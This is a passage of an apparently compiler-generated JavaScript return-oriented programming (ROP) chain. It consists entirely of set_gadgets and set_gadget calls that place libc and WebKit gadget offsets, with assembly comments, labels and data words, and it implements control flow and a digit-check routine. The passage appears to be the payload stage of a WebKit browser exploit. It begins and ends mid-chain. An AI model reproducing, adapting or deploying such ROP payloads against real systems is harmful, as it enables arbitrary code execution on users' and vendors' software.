db([0, 0]); // 0x0
//L2752:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+178400, //L2781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178416, //L2782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+178384, //L2780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2780:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2782:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+178528, //L2784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178576, //L2787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+178544, //L2785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2784:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2785:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2786:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2787:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+178688, //L2788+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+178680, //L2788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2788:
db([0, 0]); // 0x0
set_gadgets([
ropchain+178704, //L2788+24
ropchain+178720, //L2783
libc_base+782311, //pop rsp
ropchain+178736, //L2789
//L2783:
libc_base+782311, //pop rsp
ropchain+179216, //L2790
//L2789:
//L2791:
libc_base+764760, //pop rsi
ropchain+178776, //L2792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2792:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2794:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+178896, //L2797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+178880, //L2795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2795:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2797:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179056, //L2801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179008, //L2798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179024, //L2799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2798:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2799:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2800:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L2801:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179112, //L2802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2802:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2804:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+179192, //L2805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+175896, //L2714
//L2790:
libc_base+764760, //pop rsi
ropchain+179256, //L2807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2807:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2809:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179376, //L2812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179360, //L2810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2810:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2812:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179520, //L2815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179488, //L2813
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179504, //L2814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2813:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2815:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+179600, //L2816
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2816:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2818:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+179720, //L2821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+179704, //L2819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2819:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+179832, //L2822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+179864, //L2824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179848, //L2823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2822:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2823:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2824:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+180008, //L2827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+179992, //L2826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2825:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L2826:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2827:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+180128, //L2828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180160, //L2830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+180144, //L2829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2828:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2829:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180264, //L2831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180280, //L2832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2831:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2832:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180400, //L2833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180384, //L2834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2834:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2833:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+180488, //L2836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+180472, //L2835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2835:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2836:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180592, //L2837
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180608, //L2838
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2837:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2838:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180728, //L2839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+180712, //L2840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2840:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2839:
db([0, 0]); // 0x0
//__is_digit:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+180800, //L2842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2842:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+180888, //L2843
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+180936, //L2846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2843:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2844:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L2845:
db([48, 0]); // 0x30
set_gadget(webkit_base+568675,); //pop r8
//L2846:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+181032, //L2848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181016, //L2847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2847:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2848:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+181112, //L2849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2849:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2851:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+181232, //L2854
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+181216, //L2852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2852:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2854:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+181392, //L2858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+181360, //L2856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+181376, //L2857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2855:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2856:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2857:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2858:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+181448, //L2860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2860:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+181576, //L2862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+181592, //L2863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181560, //L2861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2861:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2862:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2863:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+181752, //L2867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+181720, //L2865
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181736, //L2866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2864:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2865:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2867:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+181808, //L2869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+181936, //L2871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+181952, //L2872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+181920, //L2870
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2870:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2871:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2872:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182032, //L2873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182048, //L2874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2873:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2874:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182160, //L2875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182192, //L2877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+182176, //L2876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2875:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2876:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2877:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+182368, //L2879
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182384, //L2880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182352, //L2878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2878:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2879:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2880:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+182544, //L2885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+182560, //L2886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+182496, //L2882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2882:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2883:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2884:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2885:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2886:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+182672, //L2887+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+182664, //L2887
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2887:
db([0, 0]); // 0x0
set_gadgets([
ropchain+182688, //L2887+24
ropchain+184448, //L2881
libc_base+764760, //pop rsi
ropchain+182728, //L2888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2888:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2890:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+182848, //L2893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182832, //L2891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2891:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2893:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+183008, //L2897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+182976, //L2895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+182992, //L2896
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2894:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2895:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2896:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+183064, //L2899
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2899:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+183192, //L2901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183208, //L2902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183176, //L2900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2900:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2901:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2902:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183368, //L2906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+183336, //L2904
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183352, //L2905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2903:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2904:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2905:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2906:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+183424, //L2908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2908:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+183552, //L2910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183568, //L2911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183536, //L2909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2909:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2910:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2911:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183648, //L2912
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+183664, //L2913
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2912:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2913:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183760, //L2915
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+183744, //L2914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2914:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2915:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+183840, //L2916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2916:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2917:
db([57, 0]); // 0x39
set_gadget(libc_base+144605,); //pop rdi
//L2918:
db([57, 0]); // 0x39
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+183984, //L2919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184016, //L2921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+184000, //L2920
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2919:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2920:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2921:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+2115150, //setle al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+184192, //L2923
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+184208, //L2924
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+184176, //L2922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2922:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2923:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2924:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+184352, //L2927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
